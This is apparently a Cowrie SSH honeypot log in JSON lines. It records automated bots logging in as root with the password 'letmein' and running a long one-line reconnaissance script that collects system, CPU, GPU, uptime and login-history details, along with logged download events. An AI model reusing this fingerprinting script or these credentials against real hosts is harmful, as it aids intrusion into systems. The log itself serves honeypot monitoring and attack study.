{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.026927Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.028358Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.029966Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.030679Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.031498Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.033036Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.033632Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.034210Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.034919Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.035776Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.036151Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.373455Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.374462Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.375668Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50682,"dst_ip":"1.2.3.4","dst_port":22,"session":"cde0098f7599","protocol":"ssh","message":"New connection: 217.72.205.35:50682 (1.2.3.4:22) [session: cde0098f7599]","sensor":"my-vps","timestamp":"2025-09-08T19:17:01.370366Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:17:01.371893Z","src_ip":"217.72.205.35","session":"cde0098f7599"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46158,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd317f222845","protocol":"ssh","message":"New connection: 212.227.235.229:46158 (1.2.3.4:22) [session: cd317f222845]","sensor":"my-vps","timestamp":"2025-09-08T19:17:02.868149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:17:03.121535Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:17:03.253966Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34758,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a38d47e4788","protocol":"ssh","message":"New connection: 212.227.125.160:34758 (1.2.3.4:22) [session: 9a38d47e4788]","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.053588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.172408Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.login.success","username":"root","password":"letmein","message":"login attempt [root/letmein] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.303127Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.372249Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:17:04.934218Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.935083Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.935627Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.936660Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.937887Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.938765Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.939660Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.941017Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.941678Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.942202Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.942649Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.943330Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:17:04.943999Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:17:05.222848Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:17:05.223777Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:17:05.225070Z","src_ip":"212.227.235.229","session":"cd317f222845"}
{"eventid":"cowrie.login.success","username":"root","password":"letmein","message":"login attempt [root/letmein] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:17:05.772263Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:17:06.421484Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.422240Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.423029Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.424147Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.425230Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.426176Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.427079Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.428377Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.429167Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.429785Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.430418Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.431141Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.431742Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.750500Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.751523Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:17:06.752759Z","src_ip":"212.227.125.160","session":"9a38d47e4788"}
{"eventid":"cowrie.session.connect","src_ip":"186.96.145.241","src_port":46568,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0b86bf560fb","protocol":"ssh","message":"New connection: 186.96.145.241:46568 (1.2.3.4:22) [session: d0b86bf560fb]","sensor":"my-vps","timestamp":"2025-09-08T19:17:32.803206Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:17:32.959443Z","src_ip":"186.96.145.241","session":"d0b86bf560fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39882,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d9607c17023","protocol":"ssh","message":"New connection: 212.227.235.229:39882 (1.2.3.4:22) [session: 0d9607c17023]","sensor":"my-vps","timestamp":"2025-09-08T19:18:25.598502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:18:25.608100Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
